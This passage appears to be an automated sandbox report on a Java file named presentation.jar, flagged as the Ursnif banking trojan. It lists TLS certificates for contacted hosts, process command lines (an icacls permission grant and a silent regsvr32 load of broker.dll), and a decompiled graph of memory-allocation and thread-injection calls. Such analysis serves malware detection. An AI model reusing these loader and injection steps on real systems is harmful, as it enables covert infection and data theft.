                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                  May 6, 2021 17:58:11.429822922 CEST143.204.209.88443192.168.2.349731CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USThu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                  May 6, 2021 17:58:11.748223066 CEST35.181.18.61443192.168.2.349734CN=*.112.2o7.net, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Apr 14 02:00:00 CEST 2021 Thu Sep 24 02:00:00 CEST 2020 Fri Nov 10 01:00:00 CET 2006Thu Apr 21 01:59:59 CEST 2022 Tue Sep 24 01:59:59 CEST 2030 Mon Nov 10 01:00:00 CET 2031771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                  CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 10 01:00:00 CET 2006Mon Nov 10 01:00:00 CET 2031
                                                                                                                                                                                  May 6, 2021 17:58:11.748944044 CEST35.181.18.61443192.168.2.349733CN=*.112.2o7.net, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Apr 14 02:00:00 CEST 2021 Thu Sep 24 02:00:00 CEST 2020 Fri Nov 10 01:00:00 CET 2006Thu Apr 21 01:59:59 CEST 2022 Tue Sep 24 01:59:59 CEST 2030 Mon Nov 10 01:00:00 CET 2031771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                  CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 10 01:00:00 CET 2006Mon Nov 10 01:00:00 CET 2031
                                                                                                                                                                                  May 6, 2021 17:58:12.119709015 CEST34.202.206.65443192.168.2.349737CN=*.truste-svc.net, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USSat Apr 25 13:19:21 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Thu Jun 23 16:37:27 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                  May 6, 2021 17:58:12.120345116 CEST34.202.206.65443192.168.2.349736CN=*.truste-svc.net, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USSat Apr 25 13:19:21 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Thu Jun 23 16:37:27 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                  May 6, 2021 17:58:12.845282078 CEST50.87.249.219443192.168.2.349735CN=cpcalendars.servicesteam.org CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Apr 26 07:10:28 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Sun Jul 25 07:10:28 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49188-49192-61-49190-49194-107-106-49162-49172-53-49157-49167-57-56-49187-49191-60-49189-49193-103-64-49161-49171-47-49156-49166-51-50-49196-49195-49200-157-49198-49202-159-163-49199-156-49197-49201-158-162-255,10-11-13-23-0,23-24-25-9-10-11-12-13-14-22,0d2935c58fe676744fecc8614ee5356c7
                                                                                                                                                                                  CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                  Statistics

                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Behavior

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  System Behavior

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:17:58:00
                                                                                                                                                                                  Start date:06/05/2021
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'' >> C:\cmdlinestart.log 2>&1
                                                                                                                                                                                  Imagebase:0xbd0000
                                                                                                                                                                                  File size:232960 bytes
                                                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:17:58:01
                                                                                                                                                                                  Start date:06/05/2021
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:17:58:01
                                                                                                                                                                                  Start date:06/05/2021
                                                                                                                                                                                  Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'
                                                                                                                                                                                  Imagebase:0x11b0000
                                                                                                                                                                                  File size:192376 bytes
                                                                                                                                                                                  MD5 hash:28733BA8C383E865338638DF5196E6FE
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Java
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:17:58:03
                                                                                                                                                                                  Start date:06/05/2021
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
                                                                                                                                                                                  Imagebase:0x920000
                                                                                                                                                                                  File size:29696 bytes
                                                                                                                                                                                  MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:17:58:03
                                                                                                                                                                                  Start date:06/05/2021
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:17:58:05
                                                                                                                                                                                  Start date:06/05/2021
                                                                                                                                                                                  Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' https://www.java.com/
                                                                                                                                                                                  Imagebase:0x7ff6295c0000
                                                                                                                                                                                  File size:823560 bytes
                                                                                                                                                                                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:17:58:05
                                                                                                                                                                                  Start date:06/05/2021
                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4812 CREDAT:17410 /prefetch:2
                                                                                                                                                                                  Imagebase:0x910000
                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:17:58:13
                                                                                                                                                                                  Start date:06/05/2021
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll
                                                                                                                                                                                  Imagebase:0x90000
                                                                                                                                                                                  File size:20992 bytes
                                                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000A.00000003.401528922.0000000003200000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  Disassembly

                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                  Reset < >

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:2.9%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                    Signature Coverage:5.9%
                                                                                                                                                                                    Total number of Nodes:1110
                                                                                                                                                                                    Total number of Limit Nodes:24

                                                                                                                                                                                    Graph

                                                                                                                                                                                    execution_graph 16602 4de207b 16603 4de2090 16602->16603 16604 4de202f 16602->16604 16603->16604 16606 4de20c9 16603->16606 16604->16604 16607 4de20eb 16606->16607 16609 4de2668 16607->16609 16610 4de26ad 16609->16610 16611 4de2746 VirtualAlloc 16610->16611 16613 4de270b VirtualAlloc 16610->16613 16612 4de278c 16611->16612 16614 4de27a5 VirtualAlloc 16612->16614 16613->16611 16629 4de231e 16614->16629 16617 4de28df VirtualProtect 16619 4de28fe 16617->16619 16621 4de2931 16617->16621 16618 4de280e 16618->16617 16620 4de290c VirtualProtect 16619->16620 16619->16621 16620->16619 16622 4de29b3 VirtualProtect 16621->16622 16623 4de29ee VirtualProtect 16622->16623 16625 4de2a4b VirtualFree GetPEB 16623->16625 16626 4de2a77 16625->16626 16631 4de259e GetPEB 16626->16631 16628 4de2abb 16630 4de232d VirtualFree 16629->16630 16630->16618 16632 4de25ce 16631->16632 16632->16628 15383 4d71e04 15384 4d71e1a 15383->15384 15385 4d71e89 InterlockedDecrement 15383->15385 15386 4d71e21 InterlockedIncrement 15384->15386 15391 4d71e74 15384->15391 15387 4d71e98 15385->15387 15385->15391 15389 4d71e34 HeapCreate 15386->15389 15386->15391 15388 4d71eca HeapDestroy 15387->15388 15390 4d71ea5 SleepEx 15387->15390 15393 4d71ebe CloseHandle 15387->15393 15388->15391 15389->15391 15392 4d71e4a 15389->15392 15390->15387 15390->15393 15395 4d71ca4 CreateThread 15392->15395 15393->15388 15396 4d71cc7 QueueUserAPC 15395->15396 15397 4d71cfc 15395->15397 15396->15397 15398 4d71cda GetLastError TerminateThread CloseHandle SetLastError 15396->15398 15397->15391 15398->15397 15373 4d811f9 15374 4d81200 UnDecorator::getDimension 15373->15374 15375 4d81c1b 15374->15375 15378 4d81948 Sleep 15374->15378 15379 4d80100 15375->15379 15378->15374 15380 4d80128 15379->15380 15381 4d80197 VirtualProtectEx 15379->15381 15380->15381 15382 4d801f0 15381->15382 15399 4d83d0c 15400 4d83d18 15399->15400 15401 4d83d13 15399->15401 15405 4d83c16 15400->15405 15417 4d8bf9b 15401->15417 15404 4d83d29 15406 4d83c22 FindHandler 15405->15406 15408 4d83cbf FindHandler 15406->15408 15411 4d83c6f 15406->15411 15421 4d83a3d 15406->15421 15408->15404 15411->15408 15480 4d820c0 15411->15480 15412 4d83c9f 15412->15408 15413 4d83a3d __CRT_INIT@12 100 API calls 15412->15413 15413->15408 15414 4d820c0 ___DllMainCRTStartup 56 API calls 15415 4d83c96 15414->15415 15416 4d83a3d __CRT_INIT@12 100 API calls 15415->15416 15416->15412 15418 4d8bfcb GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 15417->15418 15419 4d8bfbe 15417->15419 15420 4d8bfc2 15418->15420 15419->15418 15419->15420 15420->15400 15422 4d83a50 RtlAllocateHeap 15421->15422 15423 4d83b67 15421->15423 15430 4d83a74 GetVersionExA 15422->15430 15431 4d83a6d 15422->15431 15424 4d83b6d 15423->15424 15425 4d83ba2 15423->15425 15429 4d83b8c 15424->15429 15424->15431 15618 4d898db 15424->15618 15427 4d83c00 15425->15427 15428 4d83ba7 15425->15428 15427->15431 15659 4d8b14f 15427->15659 15621 4d8ae5f TlsGetValue 15428->15621 15429->15431 15439 4d8b8e0 __ioterm 46 API calls 15429->15439 15434 4d83a8f HeapFree 15430->15434 15435 4d83a84 HeapFree 15430->15435 15431->15411 15446 4d83abb 15434->15446 15435->15431 15441 4d83b96 15439->15441 15445 4d8aea2 __mtterm 3 API calls 15441->15445 15444 4d83bc4 15632 4d8add8 15444->15632 15449 4d83b9b 15445->15449 15492 4d89447 HeapCreate 15446->15492 15452 4d894a1 __heap_term 2 API calls 15449->15452 15450 4d83af1 15450->15431 15501 4d8b1c4 GetModuleHandleA 15450->15501 15452->15431 15454 4d83aff __RTC_Initialize 15462 4d83b12 GetCommandLineA 15454->15462 15471 4d83b03 15454->15471 15455 4d83bdd 15637 4d8aedf 15455->15637 15456 4d83bf4 15646 4d84237 15456->15646 15460 4d83be4 GetCurrentThreadId 15460->15431 15461 4d83bfa 15461->15431 15533 4d8bc62 15462->15533 15466 4d83b2c 15467 4d83b30 15466->15467 15468 4d83b37 15466->15468 15576 4d8aea2 15467->15576 15582 4d8bba9 15468->15582 15571 4d894a1 15471->15571 15473 4d83b50 15479 4d83b55 15473->15479 15613 4d8b8e0 15473->15613 15479->15431 16426 4d82e20 15480->16426 15482 4d820ec ___DllMainCRTStartup 16438 4d825aa 15482->16438 15487 4d82333 15487->15412 15487->15414 15488 4d82142 ___DllMainCRTStartup UnDecorator::getDimension 15488->15487 15489 4d825aa std::_Lockit::_Lockit RtlEnterCriticalSection 15488->15489 15490 4d8230d 15489->15490 15491 4d825cb _tidy_global RtlLeaveCriticalSection 15490->15491 15491->15487 15493 4d8946a 15492->15493 15494 4d89467 15492->15494 15667 4d893ec 15493->15667 15494->15450 15497 4d8949d 15497->15450 15500 4d89488 HeapDestroy 15500->15494 15502 4d8b1d6 15501->15502 15505 4d8b1df TlsAlloc 15501->15505 15503 4d8aea2 __mtterm 3 API calls 15502->15503 15504 4d8b1db 15503->15504 15504->15454 15507 4d8b343 15505->15507 15508 4d8b277 15505->15508 15507->15454 15508->15507 15731 4d898f9 15508->15731 15513 4d8ad6c __encode_pointer 3 API calls 15514 4d8b2a8 15513->15514 15515 4d8ad6c __encode_pointer 3 API calls 15514->15515 15516 4d8b2b8 15515->15516 15517 4d8ad6c __encode_pointer 3 API calls 15516->15517 15518 4d8b2c8 15517->15518 15745 4d88234 15518->15745 15521 4d8b2d9 15523 4d8add8 __decode_pointer 2 API calls 15521->15523 15522 4d8b33e 15524 4d8aea2 __mtterm 3 API calls 15522->15524 15525 4d8b2e9 15523->15525 15524->15507 15525->15522 15526 4d8b5a1 __calloc_crt 45 API calls 15525->15526 15527 4d8b302 15526->15527 15527->15522 15528 4d8add8 __decode_pointer 2 API calls 15527->15528 15529 4d8b31c 15528->15529 15529->15522 15530 4d8b323 15529->15530 15531 4d8aedf __initptd 45 API calls 15530->15531 15532 4d8b32b GetCurrentThreadId 15531->15532 15532->15507 15534 4d8bc7e 15533->15534 15542 4d8bc9d 15533->15542 15536 4d8bc86 15534->15536 15539 4d8bc92 GetLastError 15534->15539 15535 4d8bd38 15537 4d8bd40 GetEnvironmentStrings 15535->15537 15538 4d83b22 15535->15538 15536->15538 15544 4d8bcfb 15536->15544 15545 4d8bd2d FreeEnvironmentStringsW 15536->15545 15537->15538 15541 4d8bd50 15537->15541 15554 4d8b6a0 15538->15554 15539->15542 15540 4d8bd5e 15543 4d8b561 __malloc_crt 45 API calls 15540->15543 15541->15540 15541->15541 15542->15535 15542->15536 15546 4d8bd69 15543->15546 15768 4d8b561 15544->15768 15545->15538 15548 4d8bd7c 15546->15548 15549 4d8bd70 FreeEnvironmentStringsA 15546->15549 15550 4d8bd84 FreeEnvironmentStringsA 15548->15550 15549->15538 15550->15538 15551 4d8bd24 15551->15545 15553 4d84237 __setlocale_set_cat 45 API calls 15553->15551 15983 4d85bf0 15554->15983 15556 4d8b6ac GetStartupInfoA 15557 4d8b5a1 __calloc_crt 45 API calls 15556->15557 15565 4d8b6cd 15557->15565 15558 4d8b8d7 FindHandler 15558->15466 15559 4d8b854 GetStdHandle 15564 4d8b81e 15559->15564 15560 4d8b8b9 SetHandleCount 15560->15558 15561 4d8b5a1 __calloc_crt 45 API calls 15561->15565 15562 4d8b866 GetFileType 15562->15564 15563 4d8b7a1 15563->15564 15567 4d8b7ca GetFileType 15563->15567 15568 4d8b7d5 15563->15568 15564->15559 15564->15560 15564->15562 15569 4d8b87d 15564->15569 15565->15558 15565->15561 15565->15563 15565->15564 15566 4d96511 ___crtInitCritSecAndSpinCount 45 API calls 15566->15569 15567->15563 15567->15568 15568->15558 15568->15563 15570 4d96511 ___crtInitCritSecAndSpinCount 45 API calls 15568->15570 15569->15558 15569->15564 15569->15566 15570->15568 15572 4d89501 HeapDestroy 15571->15572 15573 4d894ad 15571->15573 15572->15431 15574 4d894ef 15573->15574 15575 4d894c9 VirtualFree 15573->15575 15574->15572 15575->15573 15577 4d8aeac 15576->15577 15578 4d8aeb8 15576->15578 15579 4d8add8 __decode_pointer 2 API calls 15577->15579 15580 4d8aeda 15578->15580 15581 4d8aecc TlsFree 15578->15581 15579->15578 15580->15580 15581->15580 15583 4d8bbbc 15582->15583 15584 4d8bbc1 GetModuleFileNameA 15582->15584 15984 4d8f4fd 15583->15984 15586 4d8bbe8 15584->15586 15988 4d8ba11 15586->15988 15588 4d83b3c 15588->15473 15593 4d8b92c 15588->15593 15590 4d8b561 __malloc_crt 45 API calls 15591 4d8bc2a 15590->15591 15591->15588 15592 4d8ba11 _parse_cmdline 47 API calls 15591->15592 15592->15588 15594 4d8b939 15593->15594 15595 4d8b93e _strlen 15593->15595 15596 4d8f4fd ___initmbctable 64 API calls 15594->15596 15597 4d83b45 15595->15597 15598 4d8b5a1 __calloc_crt 45 API calls 15595->15598 15596->15595 15597->15473 15607 4d89759 15597->15607 15605 4d8b971 _strlen 15598->15605 15599 4d8b9cc 15600 4d84237 __setlocale_set_cat 45 API calls 15599->15600 15600->15597 15601 4d8b5a1 __calloc_crt 45 API calls 15601->15605 15602 4d8b9f1 15603 4d84237 __setlocale_set_cat 45 API calls 15602->15603 15603->15597 15604 4d8c0d2 _strcpy_s 45 API calls 15604->15605 15605->15597 15605->15599 15605->15601 15605->15602 15605->15604 15606 4d85973 __invoke_watson 10 API calls 15605->15606 15606->15605 15608 4d89762 __cinit 15607->15608 16234 4d9434f 15608->16234 15610 4d89781 __initterm_e 15612 4d897a2 __cinit 15610->15612 16238 4d83e45 15610->16238 15612->15473 15615 4d8b8e7 15613->15615 15614 4d83b65 15614->15467 15615->15614 15616 4d8b8fb RtlDeleteCriticalSection 15615->15616 15617 4d84237 __setlocale_set_cat 45 API calls 15615->15617 15616->15615 15617->15615 16336 4d897eb 15618->16336 15620 4d898e6 15620->15429 15622 4d83bac 15621->15622 15623 4d8ae6f 15621->15623 15626 4d8b5a1 15622->15626 15624 4d8add8 __decode_pointer 2 API calls 15623->15624 15625 4d8ae7a TlsSetValue 15624->15625 15625->15622 15628 4d8b5a5 15626->15628 15629 4d83bb8 15628->15629 15630 4d8b5c5 Sleep 15628->15630 16356 4d96b83 15628->16356 15629->15431 15629->15444 15631 4d8b5da 15630->15631 15631->15628 15631->15629 15635 4d8ade7 15632->15635 15633 4d8ae0c GetModuleHandleA 15634 4d8ae1b GetProcAddress 15633->15634 15636 4d83bd6 15633->15636 15634->15636 15635->15633 15635->15636 15636->15455 15636->15456 16373 4d85bf0 15637->16373 15639 4d8aeeb GetModuleHandleA 15640 4d8af0d 15639->15640 15641 4d8af31 InterlockedIncrement 15639->15641 15640->15641 15642 4d883c2 __lock 43 API calls 15641->15642 15643 4d8af58 ___addlocaleref 15642->15643 16374 4d8af8a 15643->16374 15645 4d8af84 FindHandler 15645->15460 15647 4d84243 FindHandler 15646->15647 15648 4d84282 15647->15648 15650 